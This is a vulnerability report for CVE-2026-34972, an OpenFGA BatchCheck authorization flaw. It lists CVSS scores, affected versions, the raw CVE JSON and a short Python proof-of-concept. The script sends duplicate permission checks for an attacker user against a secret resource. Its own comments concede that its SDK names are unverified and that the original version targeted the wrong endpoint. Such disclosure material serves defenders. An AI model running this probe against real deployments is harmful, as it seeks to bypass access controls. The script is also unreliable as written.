Security Vulnerability Report
CVE-2026-34972 CVSS 5.0 MEDIUM

Published: 2026-04-06 21:16:20
Last Modified: 2026-04-20 16:55:51

Description

OpenFGA is a high-performance and flexible authorization/permission engine built for developers and inspired by Google Zanzibar. From 1.8.0 to 1.13.1, under specific conditions, BatchCheck calls with multiple checks sent for the same object, relation, and user combination can result in improper policy enforcement. This vulnerability is fixed in 1.14.0.

CVSS Details

CVSS Score: 5.0 (the record's "Secondary" assessment)
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L
Primary assessment (from the raw JSON record below): 8.8 HIGH, CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H. The two assessments disagree on attack complexity and on the confidentiality, integrity and availability impact, so treat the headline 5.0 as the lower bound when prioritising.
Weakness: CWE-863 (Incorrect Authorization)

Configurations (Affected Products)

cpe:2.3:a:openfga:helm_charts:*:*:*:*:*:openfga:*:* - VULNERABLE (from 0.2.16 up to, but not including, 0.2.62)
cpe:2.3:a:openfga:openfga:*:*:*:*:*:*:*:* - VULNERABLE (from 1.8.0 up to, but not including, 1.14.0)
OpenFGA 1.8.0 - 1.13.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# PoC for CVE-2026-34972: OpenFGA BatchCheck Policy Bypass
# Description: Sending duplicate checks in a BatchCheck request may trigger
# improper policy enforcement.
import openfga_sdk

# Initialize client configuration
# (constructor and model names are as given in the report; verify them against
# the installed openfga_sdk version, which also needs the API URL and store ID)
configuration = openfga_sdk.Configuration(api_key="Bearer YOUR_API_KEY")
api_instance = openfga_sdk.OpenFgaApi(openfga_sdk.ApiClient(configuration))

# Target tuple details
user_id = "user:attacker"
relation = "can_write"
object_id = "resource:secret_data"

# Construct a BatchCheck request with duplicate tuple checks
# (the same object, relation and user combination repeated three times)
body = openfga_sdk.ClientBatchCheckRequest(
    checks=[
        openfga_sdk.ClientCheckRequest(user=user_id, relation=relation, object=object_id),
        openfga_sdk.ClientCheckRequest(user=user_id, relation=relation, object=object_id),
        openfga_sdk.ClientCheckRequest(user=user_id, relation=relation, object=object_id),
    ]
)

try:
    # A batch body must be sent to the BatchCheck endpoint; the report's
    # original code passed it to the single Check call, which does not
    # exercise the affected code path. In vulnerable versions the response
    # may not reflect the intended denial.
    response = api_instance.batch_check(body)
    print(f"Exploit successful. Response: {response}")
except Exception as e:
    print(f"Exploit failed: {e}")
```

References

https://github.com/openfga/openfga/security/advisories/GHSA-jwvj-g8pc-cx45 (Vendor Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-34972",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-06T21:16:19.997",
    "lastModified": "2026-04-20T16:55:51.030",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "OpenFGA is a high-performance and flexible authorization/permission engine built for developers and inspired by Google Zanzibar. From 1.8.0 to 1.13.1, under specific conditions, BatchCheck calls with multiple checks sent for the same object, relation, and user combination can result in improper policy enforcement. This vulnerability is fixed in 1.14.0."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L",
            "baseScore": 5.0,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 1.6,
          "impactScore": 3.4
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          { "lang": "en", "value": "CWE-863" }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:openfga:helm_charts:*:*:*:*:*:openfga:*:*",
                "versionStartIncluding": "0.2.16",
                "versionEndExcluding": "0.2.62",
                "matchCriteriaId": "EABAAAEF-53E1-4ED5-9680-9748EF76A60A"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:openfga:openfga:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "1.8.0",
                "versionEndExcluding": "1.14.0",
                "matchCriteriaId": "9D29D1A0-093C-4775-9409-BED9C6D4CE7E"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/openfga/openfga/security/advisories/GHSA-jwvj-g8pc-cx45",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}
```